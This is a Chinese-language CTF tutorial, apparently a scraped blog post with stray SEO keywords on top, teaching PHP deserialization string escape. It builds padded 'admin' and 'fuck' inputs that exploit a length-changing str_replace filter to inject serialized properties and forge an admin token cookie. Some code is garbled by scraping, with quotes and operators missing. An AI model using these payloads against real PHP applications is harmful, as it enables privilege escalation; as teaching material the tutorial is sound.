常州做网站哪家便宜,织梦装修网站模板,wordpress关闭主题,手工艺品网站模板首先#xff0c;必须先明白#xff0c;这个点并不难#xff0c;我给大家梳理一遍就会明白。 反序列化字符串逃逸就是序列化过程中逃逸出来字符#xff0c;是不是很简单#xff0c;哈哈哈#xff01;
好了#xff0c;不闹了#xff0c;其实#xff1a;
这里你们只要懂…首先必须先明白这个点并不难我给大家梳理一遍就会明白。 反序列化字符串逃逸就是序列化过程中逃逸出来字符是不是很简单哈哈哈
好了不闹了其实
这里你们只要懂得一个基础
serialize() 函数序列化后可以保留其原始数据类型和结构
而filter() 函数则可以对序列化后的字符串进行过滤例如去除不安全的字符防止代码注入攻击等。具体过滤规则需要根据实际需求来定制。 举个栗子
?php
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
}
$unew user(admin,123456);
echo serialize($u);
这里就是最最基础的一个反序列化然后运行得到的结果是
O:4:user:3:{s:8:username;s:5:admin;s:8:password;s:6:123456;s:3:BTG;i:0;}
1.这里在实战中相当于拿到一道题目先拿到最初的反序列化 接下来我在原来的代码上稍微做个字符串逃逸
再强调一次filter() 函数则可以对序列化后的字符串进行过滤例如去除不安全的字符防止代码注入攻击等。具体过滤规则需要根据实际需求来定制。
2修改一下原来代码filter() 函数对序列化后的字符串进行过滤进行字符串逃逸。
?php
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
}function filter($s){return str_replace(admin,hacker,$s);
}
$u new user (admin,hacker,$s);
$u_serializeserialize($u);
$usfilter($u_serialize);//$unew user(admin,123456);
//echo serialize($u);echo $us;O:4:user:3:{s:8:username;s:5:admin;s:8:password;s:6:123456;s:3:BTG;i:0;}//最初
O:4:user:3:{s:8:username;s:5:hacker;s:8:password;s:6:123456;s:3:BTG;i:0;}//最新逃逸后
在序列化字符串中s:5:hacker 表示字符串类型的属性值其中 s:5: 表示字符串长度为 5而实际上应该是 6hacker。到这里已经逃逸成功了。这是因为在 filter() 函数中将 admin 替换为 hacker 后字符串长度发生了变化导致序列化字符串中的长度信息不准确。
所以接下来这里我就要把;s:3:BTG;i:0;这里的BTG变成1
代码
?php
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
}function filter($s){return str_replace(admin,hacker,$s);
}
$u new user (adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin;s:8:password;s:6:123456;s:3:BTG;i:1;},123456,$s);//这里就是把;s:8:password;s:6:123456;s:3:BTG;i:1;}放进admin里面补齐最后一个字符而已;s:8:password;s:6:123456;s:3:BTG;i:1;}这里有45个字符就直接一共45个admin因为每次逃逸一个字符所以必须重复45次$u_serializeserialize($u);
$usfilter($u_serialize);echo($u_serialize);
结果O:4:user:3:{s:8:username;s:270:hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker;s:8:password;s:6:123456;s:3:BTG;i:1;};s:8:password;s:6:123456;s:3:BTG;i:0;}其实就到这里就搞定了如果不放心那就var——dump把反序列化输出出来 验证阶段:
?php
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
}function filter($s){return str_replace(admin,hacker,$s);
}
$u new user (adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin;s:8:password;s:6:123456;s:3:BTG;i:1;},123456,$s);
$u_serializeserialize($u);
$usfilter($u_serialize);$objunserialize($us);var_dump($obj);
结果 object(user)#2 (3) { [username] string(270) hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker [password] string(6) 123456 [BTG] int(1) } 这里BTG从0变成了1说明你是污染成功了的因为我的原代码里面写死了BTG是0的现在变成了1所以证明反序列化是成功了。
我说现在大家应该都已经懂得反序列化字符串逃逸的一半了不信让我来引导大家做道例题就好了
?php # message.php error_reporting(0); class message{ public $from; public $msg; public $to; public $tokenuser; public function __construct($f,$m,$t){ $this-from $f; $this-msg $m; $this-to $t; } } $f $_GET[f]; $m $_GET[m]; $t $_GET[t]; if(isset($f) isset($m) isset($t)){ $msg new message($f,$m,$t); $umsg str_replace(fuck, loveU, serialize($msg)); setcookie(msg,base64_encode($umsg)); echo Your message has been sent; } highlight_file(__FILE__);
字符串逃逸特征 $umsg str_replace(fuck, loveU, serialize($msg));
做这种题就三步走千万别给自己加戏
第一步先拿到以个正常最初的反序列化
代码如下
?phpclass message{public $from;public $msg;public $to;public $tokenuser;public function __construct($f,$m,$t){$this-from$f;$this-to$t;}}
function filter($msg){return str_replace(fuck,loveU,$msg);
}
$msgnew message(a,b,c);$msg_1serialize($msg);echo $msg_1;O:7:message:4:{s:4:from;s:1:a;s:3:msg;N;s:2:to;s:1:c;s:5:token;s:4:user;} 第二步使用filter进行一次字符串逃逸。
?phpclass message{public $from;public $msg;public $to;public $tokenuser;public function __construct($f,$m,$t){$this-from$f;$this-to$t;}}
function filter($msg){return str_replace(fuck,loveU,$msg);
}
$msgnew message(fuck,b,c);$msg_1serialize($msg);$msg_2filter($msg_1);echo $msg_2;
O:7:message:4:{s:4:from;s:4:loveU;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:4:user;}第三步算出要逃逸的次数进行复制输出
s:4:loveU很明显逃逸一个字符因为每次逃逸一个字符;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:4:user;}这里有62个字符要逃逸所以必须复制61次fuck还有这得改成;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;}因为后面需要admin权限。
简单来说就是把;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;}丢到fuck后面然后根据字符个数复制几次就完成了。
?phpclass message{public $from;public $msg;public $to;public $tokenuser;public function __construct($f,$m,$t){$this-from$f;$this-msg$m;$this-to$t;}}
function filter($msg){return str_replace(fuck,loveU,$msg);
}
$msgnew message(fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;},b,c);$msg_1serialize($msg);$msg_2filter($msg_1);echo $msg_2; O:7:message:4:{s:4:from;s:310:loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;};s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:4:user;}
搞定了这就完成了如果不放心可以加一步验证因为数很多字符容易出错 也就改一下输出那个这个半分钟就好最终变成了admin说明我们反序列化成功的了。
?php highlight_file(__FILE__); include(flag.php); class message{ public $from; public $msg; public $to; public $tokenuser; public function __construct($f,$m,$t){ $this-from $f; $this-msg $m; $this-to $t; } } if(isset($_COOKIE[msg])){ $msg unserialize(base64_decode($_COOKIE[msg])); if($msg-tokenadmin){ echo $flag; } }
这道题目还有一点尾巴这道题目还有一点隐藏代码接下来把fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;}加入道cookie就能拿到flag了
最后的最后再进行一次总结字符串逃逸有三步
1.拿到正常序列化后字符串。这个题目都会给·代码你直接复制然后反序列化就好没什么技术含量
2.使用filter进行一次字符串逃逸。
3.第三步算出要逃逸的次数进行复制输出但是这里一定要提醒大家一下字符串逃逸分为增多和减少苦于篇幅上面我只介绍了一种增多另外一种也是可以使用本方法的只是有些地方要改一下这个等我之后再更新文章
ps记住无论字符串逃逸是增多还是减少都是因为 return str_replace这个玩意替换字符后造成的逃逸。
希望我的文章能够帮助大家谢谢看到这里的各位。
